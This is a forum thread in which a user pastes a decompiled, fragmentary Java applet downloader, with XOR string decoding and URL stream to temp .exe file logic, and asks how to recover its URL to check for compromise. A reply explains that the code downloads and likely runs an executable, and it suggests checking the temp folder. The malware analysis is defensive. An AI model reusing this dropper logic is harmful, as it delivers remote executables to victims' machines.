Results 1 to 2 of 2
  1. #1
    javadan is offline Member
    Join Date
    Jan 2011
    Rep Power

    Default Decrypting Java Malware

    Hey guys,

    I was trying to reverse engineer some java malware. I copied and pasted the part of the code that seems to set the URL. my logic is trying to get the URL so that I can see if there were any requests made to that URL so that I can figure out if I've been compromised.

    I was wondering if you guys can help me modifying this code so that I can decrypt the URL. So far I got this:

    import java.applet.Applet;
    import java.util.*;
    import javax.swing.JList;

    // Referenced classes of package folder:
    // Temp, Glocker

    //public class Globus extends Applet

    class Globus {

    public void start()
    int arr[] = {
    86, 81, 79
    String balls = decrypt(arr);
    int arr2[] = {
    13, 70, 91, 70
    String rores = decrypt(arr2);
    int arr3[] = {
    73, 66, 85, 66, 13, 74, 76, 13, 87, 78,
    83, 71, 74, 81
    String bdfd = decrypt(arr3);
    String ss = balls;
    String s = ss;
    String s1 = (new StringBuilder()).append(Math.random()).append(rore s).toString();
    String s2 = System.getProperty(bdfd);
    String str = (new StringBuilder(String.valueOf(s2))).append(s1).toSt ring();
    URL url = new URL(s);
    InputStream inputstream = url.openStream();
    FileOutputStream fileoutputstream = new FileOutputStream(str);
    byte abyte0[] = new byte[1024];
    int i;
    while((i =, 0, abyte0.length)) != -1)
    fileoutputstream.write(abyte0, 0, i);
    catch(Exception exception1) { }
    catch(Exception exception) { }

    static String decrypt(int arr[])
    byte xor = (byte)(int)Math.ceil(34.329999999999998D);
    StringBuffer strbuf = new StringBuffer();
    for(int i = 0; i < arr.length; i++)
    arr[i] = arr[i] ^ xor;

    String result = strbuf.toString();
    return result;

    When I try to execute it I get Exception in thread "main" java.lang.NoSuchMethodError: main


  2. #2
    travishein's Avatar
    travishein is offline Senior Member
    Join Date
    Sep 2009
    Rep Power


    the arr[] become the url here it is the literal string "url", so you don't have the part that provides the data for the url itself yet.

    Though when this runs it tries to create a random number named file with a .exe extension (e.g. 0.34068800532325605.exe) in the system's temp folder,

    then it connects to this url and downloads contents into this executable.

    I suspect it then executes this executable.

    so to tell if you have been infected, you might try to see in task manager if any funny looking executables are currently running, or if there are funny .exe files in your temp folder.

Similar Threads

  1. malware book
    By danghieu in forum New To Java
    Replies: 1
    Last Post: 05-04-2010, 12:01 PM
  2. Need help on a decrypting program
    By Mayur in forum New To Java
    Replies: 0
    Last Post: 04-26-2009, 06:45 AM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts